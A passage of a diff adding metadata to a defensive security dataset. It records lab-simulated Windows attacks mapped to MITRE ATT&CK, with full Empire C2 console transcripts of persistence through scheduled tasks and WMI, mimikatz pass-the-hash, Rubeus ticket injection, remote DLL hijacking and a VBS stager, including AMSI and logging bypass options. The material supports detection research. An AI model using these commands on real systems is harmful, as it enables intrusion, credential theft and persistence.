+            "adversary_view": "(Empire: stager/multi/launcher) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nA7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            \nHBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            \nUF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         6404   5/0.0    2020-09-20 21:28:07  http            \n\n3MWPS8L6 ps 172.18.39.5     WORKSTATION5      THESHIRE\\pgustavo       powershell         7312   5/0.0    2020-09-21 07:12:36  http            \n\n(Empire: agents) > interact 3MWPS8L6         \n(Empire: 3MWPS8L6) > usemodule persistence/userland/schtasks\n(Empire: powershell/persistence/userland/schtasks) > info\n\n              Name: Invoke-Schtasks\n            Module: powershell/persistence/userland/schtasks\n        NeedsAdmin: False\n        OpsecSafe: False\n          Language: powershell\nMinLanguageVersion: 2\n        Background: False\n  OutputExtension: None\n\nAuthors:\n  @mattifestation\n  @harmj0y\n\nDescription:\n  Persist a stager (or script) using schtasks. This has a\n  moderate detection/removal rating.\n\nComments:\n  https://github.com/mattifestation/PowerSploit/blob/master/Pe\n  rsistence/Persistence.psm1\n\nOptions:\n\n  Name             Required    Value                     Description\n  ----             --------    -------                   -----------\n  Agent            True        3MWPS8L6                  Agent to run module on.                 \n  Listener         False                                 Listener to use.                        \n  Obfuscate        False       False                     Switch. Obfuscate the launcher          \n                                                        powershell code, uses the               \n                                                        ObfuscateCommand for obfuscation types. \n                                                        For powershell only.                    \n  ObfuscateCommand False       Token\\All\\1               The Invoke-Obfuscation command to use.  \n                                                        Only used if Obfuscate switch is True.  \n                                                        For powershell only.                    \n  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in \n                                                        the stager code.                        \n  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   \n                                                        the stager code.                        \n  DailyTime        False       09:00                     Daily time to trigger the script        \n                                                        (HH:mm).                                \n  IdleTime         False                                 User idle time (in minutes) to trigger  \n                                                        script.                                 \n  TaskName         True        Updater                   Name to use for the schtask.            \n  RegPath          False       HKCU:\\Software\\Microsoft  Registry location to store the script   \n                              \\Windows\\CurrentVersion\\  code. Last element is the key name.     \n                              debug                   \n  ADSPath          False                                 Alternate-data-stream location to store \n                                                        the script code.                        \n  ExtFile          False                                 Use an external file for the payload    \n                                                        instead of a stager.                    \n  Cleanup          False                                 Switch. Cleanup the trigger and any     \n                                                        script from specified location.         \n  UserAgent        False       default                   User-agent string to use for the staging\n                                                        request (default, none, or other).      \n  Proxy            False       default                   Proxy to use for request (default, none,\n                                                        or other).                              \n  ProxyCreds       False       default                   Proxy credentials                       \n                                                        ([domain\\]username:password) to use for \n                                                        request (default, none, or other).      \n\n(Empire: powershell/persistence/userland/schtasks) > set Listener http\n(Empire: powershell/persistence/userland/schtasks) > set TaskName MordorSchtask\n(Empire: powershell/persistence/userland/schtasks) > execute\n[>] Module is not opsec safe, run? [y/N] y\n[*] Tasked 3MWPS8L6 to run TASK_CMD_WAIT\n[*] Agent 3MWPS8L6 tasked with task ID 1\n[*] Tasked agent 3MWPS8L6 to run module powershell/persistence/userland/schtasks\n(Empire: powershell/persistence/userland/schtasks) > \nSUCCESS: The scheduled task \"MordorSchtask\" has successfully been created.\nSchtasks persistence established using listener http stored in HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\debug with MordorSchtask daily trigger at 09:00."
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:25.114332+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-190319131123.yaml": {
+        "title": "Empire Over-Pass-The-Hash",
+        "id": "SDWIN-190319131123",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2019/03/19",
+        "modification_date": "2020/09/20",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "Over-Pass-The-Hash",
+            "Patching LSASS"
+        ],
+        "description": "This dataset represents adversaries taking a hash/key (rc4_hmac, aes256_cts_hmac_sha1, etc.) for a domain-joined user into a fully-fledged Kerberos TGT. In this case, an adversary can write the hash/key into an existing logon session (i.e. a sacrificial logon session) section in the memory content of LSASS and kick off the regular Kerberos authentication process.",
+        "attack_mappings": [
+            {
+                "technique": "T1550",
+                "sub-technique": "002",
+                "tactics": [
+                    "TA0005",
+                    "TA0008"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_over_pth_patch_lsass.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "mimikataz_pth",
+                    "script": "https://github.com/OTRF/Blacksmith/blob/master/aws/Security-Datasets/cfn-files/scripts/Invoke-Mimikatz.ps1"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "(Empire: stager/multi/launcher) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\n4EH9PC5S ps 172.18.39.6     WORKSTATION6      *THESHIRE\\wardog        powershell         5056   5/0.0    2020-09-22 02:12:12  http            \n\n(Empire: agents) > interact 4EH9PC5S\n(Empire: 4EH9PC5S) > \n(Empire: 4EH9PC5S) > usemodule credentials/mimikatz/pth*\n(Empire: powershell/credentials/mimikatz/pth) > info\n\n              Name: Invoke-Mimikatz PTH\n            Module: powershell/credentials/mimikatz/pth\n        NeedsAdmin: True\n        OpsecSafe: True\n          Language: powershell\nMinLanguageVersion: 2\n        Background: True\n  OutputExtension: None\n\nAuthors:\n  @JosephBialek\n  @gentilkiwi\n\nDescription:\n  Runs PowerSploit's Invoke-Mimikatz function to execute\n  sekurlsa::pth to create a new process. with a specific\n  user's hash. Use credentials/tokens to steal the token\n  afterwards.\n\nComments:\n  http://clymb3r.wordpress.com/ http://blog.gentilkiwi.com\n  http://blog.cobaltstrike.com/2015/05/21/how-to-pass-the-\n  hash-with-mimikatz/\n\nOptions:\n\n  Name   Required    Value                     Description\n  ----   --------    -------                   -----------\n  Agent  True        4EH9PC5S                  Agent to run module on.                 \n  CredID False                                 CredID from the store to use for ticket \n                                              creation.                               \n  user   False                                 Username to impersonate.                \n  domain False                                 The fully qualified domain name.        \n  ntlm   False                                 The NTLM hash to use.                   \n\n(Empire: powershell/credentials/mimikatz/pth) > set ntlm 81d310fa34e6a56a31145445891bb7b8\n(Empire: powershell/credentials/mimikatz/pth) > set user pgustavo\n(Empire: powershell/credentials/mimikatz/pth) > set domain theshire.local\n(Empire: powershell/credentials/mimikatz/pth) > execute\n[*] Tasked 4EH9PC5S to run TASK_CMD_JOB\n[*] Agent 4EH9PC5S tasked with task ID 1\n[*] Tasked agent 4EH9PC5S to run module powershell/credentials/mimikatz/pth\n(Empire: powershell/credentials/mimikatz/pth) > \nJob started: 1WCLFA\n\nHostname: WORKSTATION6.theshire.local / S-1-5-21-4228717743-1032521047-1810997296\n\n  .#####.   mimikatz 2.2.0 (x64) #19041 Aug 10 2020 20:07:46\n.## ^ ##.  \"A La Vie, A L'Amour\" - (oe.eo)\n## / \\ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n## \\ / ##       > http://blog.gentilkiwi.com/mimikatz\n'## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )\n  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/\n\nmimikatz(powershell) # sekurlsa::pth /user:pgustavo /domain:theshire.local /ntlm:81d310fa34e6a56a31145445891bb7b8\nuser    : pgustavo\ndomain  : theshire.local\nprogram : cmd.exe\nimpers. : no\nNTLM    : 81d310fa34e6a56a31145445891bb7b8\n  |  PID  3148\n  |  TID  6488\n  |  LSA Process is now R/W\n  |  LUID 0 ; 69262895 (00000000:0420de2f)\n  \\_ msv1_0   - data copy @ 000001C7E0166C80 : OK !\n  \\_ kerberos - data copy @ 000001C7E02B1268\n  \\_ aes256_hmac       -> null             \n  \\_ aes128_hmac       -> null             \n  \\_ rc4_hmac_nt       OK\n  \\_ rc4_hmac_old      OK\n  \\_ rc4_md4           OK\n  \\_ rc4_hmac_nt_exp   OK\n  \\_ rc4_hmac_old_exp  OK\n  \\_ *Password replace @ 000001C7E01AEDE8 (32) -> null\n\nUse credentials/token to steal the token of the created PID."
+        },
+        "references": [
+            "https://github.com/GhostPack/Rubeus#example-over-pass-the-hash",
+            "https://github.com/gentilkiwi/mimikatz/blob/a0f243b33590751a77b6d6f275313a4fe8d42c82/mimikatz/modules/sekurlsa/packages/kuhl_m_sekurlsa_kerberos.c#L566-L600"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:26.834610+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-190319145126.yaml": {
+        "title": "Rubeus Userland ASKTGT PTT",
+        "id": "SDWIN-190319145126",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2019/03/19",
+        "modification_date": "2020/09/21",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "Over-Pass-The-Hash",
+            "Not Touching LSASS"
+        ],
+        "description": "This dataset represents adversaries crafting raw AS-REQ (TGT request) traffic for a specific user and encryption key (/rc4, /aes128, /aes256, or /des) to request TGTs without touching lsass.",
+        "attack_mappings": [
+            {
+                "technique": "T1003",
+                "sub-technique": "003",
+                "tactics": [
+                    "TA0006"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/host/empire_shell_rubeus_asktgt_ptt.zip"
+            },
+            {
+                "type": "Network",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/credential_access/network/empire_shell_rubeus_asktgt_ptt.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "shell",
+                    "script": null
+                },
+                {
+                    "type": "binary",
+                    "name": "Rubeus",
+                    "module": "asktgt",
+                    "script": "https://github.com/GhostPack/Rubeus"
+                }
+            ],
+            "permissions_required": [
+                "User"
+            ],
+            "adversary_view": "(Empire: stager/multi/launcher) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\n4EH9PC5S ps 172.18.39.6     WORKSTATION6      *THESHIRE\\wardog        powershell         5056   5/0.0    2020-09-22 02:12:12  http            \n\n(Empire: agents) > interact 4EH9PC5S\n(Empire: 4EH9PC5S) > \n(Empire: 4EH9PC5S) > shell C:\\users\\sbeavers\\Desktop\\Rubeus.exe asktgt /user:pgustavo /rc4:81d310fa34e6a56a31145445891bb7b8 /ptt\n[*] Tasked 4EH9PC5S to run TASK_SHELL\n[*] Agent 4EH9PC5S tasked with task ID 2\n(Empire: 4EH9PC5S) > \n______        _                      \n  (_____ \\      | |                     \n  _____) )_   _| |__  _____ _   _  ___ \n  |  __  /| | | |  _ \\| ___ | | | |/___)\n  | |  \\ \\| |_| | |_) ) ____| |_| |___ |\n  |_|   |_|____/|____/|_____)____/(___/\n\n  v1.5.0 \n\n[*] Action: Ask TGT\n\n[*] Using rc4_hmac hash: 81d310fa34e6a56a31145445891bb7b8\n[*] Building AS-REQ (w/ preauth) for: 'theshire.local\\pgustavo'\n[+] TGT request successful!\n[*] base64(ticket.kirbi):\n\n      doIFPjCCBTqgAwIBBaEDAgEWooIETTCCBElhggRFMIIEQaADAgEFoRAbDlRIRVNISVJFLkxPQ0FMoiMw\n      IaADAgECoRowGBsGa3JidGd0Gw50aGVzaGlyZS5sb2NhbKOCBAEwggP9oAMCARKhAwIBAqKCA+8EggPr\n      SCmXhrxOqig5LjU/zlOxxj72iV0Io1vDNrnEHqq0hTNheiEb2Oz3yOEk3Ct6qioIJmjm/PE+MoazpfNa\n      DOQUkxLNyEti0ltIyI2I2docI0yIbXA8BNRrGojFdruBcOs5NdDfi2Ttsng+NcZzWmCH4D3amx7AjOMr\n      jRotAieTg98Uzt3AG03bQSlPNkLJCW/Pnz5YCE8I8zIrkkGH+mTA+mGg4cNeVJE38nOlShq0meRMKKxC\n      drFfzsCgJ64r9dVBP+LmegRcUbrPLv6d2UHc+k0ELbhhfHgiy5m06UaLfrAe8fiUcHsdN0cJ1+4f9KCL\n      NsbjXJN85QQGzdOFFjJ07hir+SZ1UU+0NSaOkbFHz178KMk2P/9yWT9UqTEHV2qXuHS4scCV5SQirH6b\n      HAWlEpqeEwh+yGUmhLGs8Jo9sBsNEQ6EdFUzA+JjD4itQa4IMgLSLNEwzkZOle85Jbw4kDFsFmtckKVu\n      1osdI7dxA9wM/dZElOVUiI2cYqbI+pOcyPJHuzhbYnVhUhKFi29ZxPe1an0T7tNoy1zCFSs0z3V5RKwZ\n      4eUVQVxYGspUbB4h21/zEbus+NGTzWtJMqb6L4abOj1iLiRgJagyFKk5h91fasaRUoVAo3VxiIbrPqfh\n      kH393T/SC9ZObPESkBY8FVvhs/kuqRZIIhflbdYsTdcp0sa/F7Mo90CREIhH3EqgIQ/e97eK1Z9fr3Ma\n      HGfFBEEYcHIm28FQU3gtyMFTSp9gswbq3YtsOMGF5oLY8Po6vAdhHV2wStV9FDPVPepT4USsZGYZ567p\n      40PiSGBRUmCevWqrIA5kNwKD8QvaefXrGLZ+oXes9dt3CqHENQ4pJN67gUZq/F5tfFWYwDkefjNWMOwY\n      lIAEvyxrxlnA8ouBkvkLSkz4jYMjUCstdJ7TiF/GMboXAX1kfQpv01sMV/39RdSaE4s6aTGlqX2vDShM\n      OSdwfSS4qTU8kTkWuKgUh/Fcs2jYbjKfDvOqfkY5fAf+JSPRwqBC4mhsoGDLd3XGFba7prlV0VopSymj\n      //ZpVE70a2VJazJHuHoS1ZWvNVILQwF0FteGc5UYQHPMlAC7v6Qr360g8mHv9PG6AS7dHb3WWnezaRV7\n      ByPSxZ2B/WHEYWROuXlAK+dKWKWU31/NK6rX8l4Re8OUeu4/lGoEwZikKWxs+jE1zSOww46iZA78zJ3u\n      QVeK8t90Z28pxwRX8mo2/PfnOEFwVJMsrBSiwLrLFDbjGqCX8ktaZ1ZTxcXLYu8mfDvCs9KAUMRvncBH\n      g5yHUuoX6dIAY6EhWmpeSmqwV5VCV1kUarhKJt+JTC3Yjg9FaPGkJlJae6OB3DCB2aADAgEAooHRBIHO\n      fYHLMIHIoIHFMIHCMIG/oBswGaADAgEXoRIEEGTttXVs0y3nHHWU3quEoDChEBsOVEhFU0hJUkUuTE9D\n      QUyiFTAToAMCAQGhDDAKGwhwZ3VzdGF2b6MHAwUAQOEAAKURGA8yMDIwMDkyMjAyMzkxM1qmERgPMjAy\n      MDA5MjIxMjM5MTNapxEYDzIwMjAwOTI5MDIzOTEzWqgQGw5USEVTSElSRS5MT0NBTKkjMCGgAwIBAqEa\n      MBgbBmtyYnRndBsOdGhlc2hpcmUubG9jYWw=\n[+] Ticket successfully imported!\n\n  ServiceName           :  krbtgt/theshire.local\n  ServiceRealm          :  THESHIRE.LOCAL\n  UserName              :  pgustavo\n  UserRealm             :  THESHIRE.LOCAL\n  StartTime             :  9/21/2020 10:39:13 PM\n  EndTime               :  9/22/2020 8:39:13 AM\n  RenewTill             :  9/28/2020 10:39:13 PM\n  Flags                 :  name_canonicalize, pre_authent, initial, renewable, forwardable\n  KeyType               :  rc4_hmac\n  Base64(key)           :  ZO21dWzTLeccdZTeq4SgMA==\n\n..Command execution completed.\n\n(Empire: 4EH9PC5S) >"
+        },
+        "references": [
+            "https://github.com/GhostPack/Rubeus#example-over-pass-the-hash"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:27.020609+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-190403133337.yaml": {
+        "title": "IKEEXT Remote Service DLL Hijack",
+        "id": "SDWIN-190403133337",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2019/04/03",
+        "modification_date": "2020/09/20",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "Remote Service DLL Hijacking",
+            "RPC over SMB Svcctl"
+        ],
+        "description": "This dataset represents adversaries copying a file remotely to replace a file which is executed by a service that is vulnerable to DLL hijack. This dataset includes",
+        "attack_mappings": [
+            {
+                "technique": "T1574",
+                "sub-technique": "001",
+                "tactics": [
+                    "TA0003",
+                    "TA0004",
+                    "TA0005"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_shell_dcerpc_smb_service_dll_hijack.zip"
+            },
+            {
+                "type": "Network",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/empire_shell_dcerpc_smb_service_dll_hijack.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "manual",
+                    "script": null
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "(Empire: agents) > usestager windows/dll\n(Empire: stager/windows/dll) > info\nName: DLL Launcher\n\nDescription:\n  Generate a PowerPick Reflective DLL to inject with\n  stager code.\n\nOptions:\n\n  Name             Required    Value             Description\n  ----             --------    -------           -----------\n  Listener         True        http              Listener to use.\n  Language         True        powershell        Language of the stager to generate.\n  Arch             True        x64               Architecture of the .dll to generate\n                                                (x64 or x86).\n  StagerRetries    False       0                 Times for the stager to retry\n                                                connecting.\n  UserAgent        False       default           User-agent string to use for the staging\n                                                request (default, none, or other).\n  Proxy            False       default           Proxy to use for request (default, none,\n                                                or other).\n  ProxyCreds       False       default           Proxy credentials\n                                                ([domain\\]username:password) to use for\n                                                request (default, none, or other).\n  OutFile          True        /tmp/wlbsctrl.dll File to output dll to.\n  Obfuscate        False       False             Switch. Obfuscate the launcher\n                                                powershell code, uses the\n                                                ObfuscateCommand for obfuscation types.\n                                                For powershell only.\n  ObfuscateCommand False       Token\\All\\1       The Invoke-Obfuscation command to use.\n                                                Only used if Obfuscate switch is True.\n                                                For powershell only.\n  AMSIBypass       False       True              Include mattifestation's AMSI Bypass in\n                                                the stager code.\n  AMSIBypass2      False       False             Include Tal Liberman's AMSI Bypass in\n                                                the stager code.\n  ScriptLogBypass  False       True              Include cobbr's Script Block Log Bypass\n                                                in the stager code.\n  ETWBypass        False       False             Include tandasat's ETW bypass in the\n                                                stager code.\n\n(Empire: stager/windows/dll) > back\n(Empire: agents) > agents\n\n[*] Active agents:\n\n  Name     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n  ----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\n  GCSKD17Z ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         1112   5/0.0    2020-09-22 03:51:02  http            \n\n(Empire: agents) > interact GCSKD17Z\n(Empire: GCSKD17Z) >\n(Empire: GCSKD17Z) > upload /tmp/wlbsctrl.dll\n[*] Tasked agent to upload wlbsctrl.dll, 124 KB\n(Empire: GCSKD17Z) > shell COPY .\\wlbsctrl.dll \\\\WORKSTATION6\\C$\\Windows\\System32\\wlbsctrl.dll\n[*] Tasked GCSKD17Z to run TASK_SHELL\n[*] Agent GCSKD17Z tasked with task ID 3\n(Empire: GCSKD17Z) > \n..Command execution completed.\n\n(Empire: GCSKD17Z) > shell sc.exe `\\`\\WORKSTATION6 stop IKEEXT\n[*] Tasked GCSKD17Z to run TASK_SHELL\n[*] Agent GCSKD17Z tasked with task ID 4\n(Empire: GCSKD17Z) > \nSERVICE_NAME: IKEEXT \n        TYPE               : 30  WIN32  \n        STATE              : 3  STOP_PENDING \n                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)\n        WIN32_EXIT_CODE    : 0  (0x0)\n        SERVICE_EXIT_CODE  : 0  (0x0)\n        CHECKPOINT         : 0x0\n        WAIT_HINT          : 0x1388\n\n..Command execution completed.\n\n(Empire: GCSKD17Z) > shell sc.exe `\\`\\WORKSTATION6 query IKEEXT\n[*] Tasked GCSKD17Z to run TASK_SHELL\n[*] Agent GCSKD17Z tasked with task ID 5\n(Empire: GCSKD17Z) > \nSERVICE_NAME: IKEEXT \n        TYPE               : 20  WIN32_SHARE_PROCESS  \n        STATE              : 1  STOPPED \n        WIN32_EXIT_CODE    : 0  (0x0)\n        SERVICE_EXIT_CODE  : 0  (0x0)\n        CHECKPOINT         : 0x0\n        WAIT_HINT          : 0x0\n\n..Command execution completed.\n\n(Empire: GCSKD17Z) > shell sc.exe `\\`\\WORKSTATION6 start IKEEXT\n[*] Tasked GCSKD17Z to run TASK_SHELL\n[*] Agent GCSKD17Z tasked with task ID 6\n(Empire: GCSKD17Z) > \nSERVICE_NAME: IKEEXT \n        TYPE               : 30  WIN32  \n        STATE              : 2  START_PENDING \n                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)\n        WIN32_EXIT_CODE    : 0  (0x0)\n        SERVICE_EXIT_CODE  : 0  (0x0)\n        CHECKPOINT         : 0x0\n        WAIT_HINT          : 0x7d0\n        PID                : 6172\n        FLAGS              : \n\n..Command execution completed.\n\n(Empire: GCSKD17Z) >"
+        },
+        "references": [
+            "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:27.223610+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-190518182022.yaml": {
+        "title": "Empire VBS Execution",
+        "id": "SDWIN-190518182022",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2019/05/18",
+        "modification_date": "2020/09/20",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "VBS Script Execution"
+        ],
+        "description": "This dataset represents adversaries executing a VBS script as a launcher for initial access.",
+        "attack_mappings": [
+            {
+                "technique": "T1059",
+                "sub-technique": "005",
+                "tactics": [
+                    "TA0002"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/execution/host/empire_launcher_vbs.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "launcher",
+                    "script": "https://github.com/BC-SECURITY/Empire/blob/master/lib/stagers/windows/launcher_vbs.py"
+                }
+            ],
+            "permissions_required": [
+                "User"
+            ],
+            "adversary_view": "(Empire: listeners) > usestager windows/launcher_vbs\n(Empire: stager/windows/launcher_vbs) > info\n\nName: VBS Launcher\n\nDescription:\n  Generates a .vbs launcher for Empire.\n\nOptions:\n\n  Name             Required    Value             Description\n  ----             --------    -------           -----------\n  Listener         True                          Listener to generate stager for.\n  Language         True        powershell        Language of the stager to generate.\n  StagerRetries    False       0                 Times for the stager to retry\n                                                connecting.\n  OutFile          False       /tmp/launcher.vbs File to output .vbs launcher to,\n                                                otherwise displayed on the screen.\n  Obfuscate        False       False             Switch. Obfuscate the launcher\n                                                powershell code, uses the\n                                                ObfuscateCommand for obfuscation types.\n                                                For powershell only.\n  ObfuscateCommand False       Token\\All\\1       The Invoke-Obfuscation command to use.\n                                                Only used if Obfuscate switch is True.\n                                                For powershell only.\n  UserAgent        False       default           User-agent string to use for the staging\n                                                request (default, none, or other).\n  Proxy            False       default           Proxy to use for request (default, none,\n                                                or other).\n  ProxyCreds       False       default           Proxy credentials\n                                                ([domain\\]username:password) to use for\n                                                request (default, none, or other).\n\n\n(Empire: stager/windows/launcher_vbs) > set Listener http\n(Empire: stager/windows/launcher_vbs) > execute\n\n[*] Stager output written out to: /tmp/launcher.vbs\n\n(Empire: stager/windows/launcher_vbs) > \n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5\n[*] New agent K47LRAEP checked in\n[+] Initial agent K47LRAEP from 172.18.39.5 now active (Slack)\n[*] Sending agent (stage 2) to K47LRAEP at 172.18.39.5\n\n(Empire: stager/windows/launcher_vbs) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nK47LRAEP ps 172.18.39.5     WORKSTATION5      THESHIRE\\pgustavo       powershell         2316   5/0.0    2020-09-04 20:10:07  http            \n\n(Empire: agents) > interact K47LRAEP\n(Empire: K47LRAEP) > \n(Empire: K47LRAEP) > shell whoami\n[*] Tasked K47LRAEP to run TASK_SHELL\n[*] Agent K47LRAEP tasked with task ID 1\n(Empire: K47LRAEP) > \ntheshire\\pgustavo\n..Command execution completed.\n\n(Empire: K47LRAEP) > \n(Empire: K47LRAEP) > "
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:27.407609+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-190518184306.yaml": {
+        "title": "Empire Elevated WMI Eventing",
+        "id": "SDWIN-190518184306",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2019/05/18",
+        "modification_date": "2020/09/20",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "Local WMI Eventing",
+            "WMI Event Subscriptions"
+        ],
+        "description": "This dataset represents adversaries leveraging WMI subscriptions locally for persistence.",
+        "attack_mappings": [
+            {
+                "technique": "T1546",
+                "sub-technique": "003",
+                "tactics": [
+                    "TA0003",
+                    "TA0004"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/persistence/host/empire_wmi_local_event_subscriptions_elevated_user.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "wmi",
+                    "script": "https://github.com/EmpireProject/Empire/blob/dev/data/module_source/persistence/Persistence.psm1"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "(Empire: powershell/privesc/bypassuac_fodhelper) > agents\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\n28BNF7RH ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5392   5/0.0    2020-09-04 20:31:17  http            \nW2TBCPHU ps 172.18.39.5     WORKSTATION5      THESHIRE\\pgustavo       powershell         5584   5/0.0    2020-09-04 20:42:01  http            \n13ZK6G7M ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5676   5/0.0    2020-09-04 20:41:59  http            \n\n(Empire: agents) > interact 13ZK6G7M\n(Empire: 13ZK6G7M) > \n(Empire: 13ZK6G7M) > usemodule persistence/elevated/wmi*\n(Empire: powershell/persistence/elevated/wmi) > info\n\n              Name: Invoke-WMI\n            Module: powershell/persistence/elevated/wmi\n        NeedsAdmin: True\n        OpsecSafe: False\n          Language: powershell\nMinLanguageVersion: 2\n        Background: False\n  OutputExtension: None\n\nAuthors:\n  @mattifestation\n  @harmj0y\n  @jbooz1\n\nDescription:\n  Persist a stager (or script) using a permanent WMI\n  subscription. This has a difficult detection/removal rating.\n\nComments:\n  https://github.com/mattifestation/PowerSploit/blob/master/Pe\n  rsistence/Persistence.psm1\n\nOptions:\n\n  Name        Required    Value                     Description\n  ----        --------    -------                   -----------\n  Agent       True        13ZK6G7M                  Agent to run module on.                 \n  Listener    True        http                      Listener to use.                        \n  DailyTime   False                                 Daily time to trigger the script        \n                                                    (HH:mm).                                \n  AtStartup   False       True                      Switch. Trigger script (within 5        \n                                                    minutes) of system startup.             \n  FailedLogon False                                 Trigger script with a failed logon      \n                                                    attempt from a specified user           \n  SubName     True        Updater                   Name to use for the event subscription. \n  ExtFile     False                                 Use an external file for the payload    \n                                                    instead of a stager.                    \n  Cleanup     False                                 Switch. Cleanup the trigger and any     \n                                                    script from specified location.         \n  UserAgent   False       default                   User-agent string to use for the staging\n                                                    request (default, none, or other).      \n  Proxy       False       default                   Proxy to use for request (default, none,\n                                                    or other).                              \n  ProxyCreds  False       default                   Proxy credentials                       \n                                                    ([domain\\]username:password) to use for \n                                                    request (default, none, or other).      \n\n(Empire: powershell/persistence/elevated/wmi) > execute\n[>] Module is not opsec safe, run? [y/N] y\n[*] Tasked 13ZK6G7M to run TASK_CMD_WAIT\n[*] Agent 13ZK6G7M tasked with task ID 1\n[*] Tasked agent 13ZK6G7M to run module powershell/persistence/elevated/wmi\n(Empire: powershell/persistence/elevated/wmi) > \nWMI persistence established using listener http with OnStartup WMI subsubscription trigger.\n\n(Empire: powershell/persistence/elevated/wmi) > \n(Empire: powershell/persistence/elevated/wmi) > \n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.5\n[*] New agent PYA28EDF checked in\n[+] Initial agent PYA28EDF from 172.18.39.5 now active (Slack)\n[*] Sending agent (stage 2) to PYA28EDF at 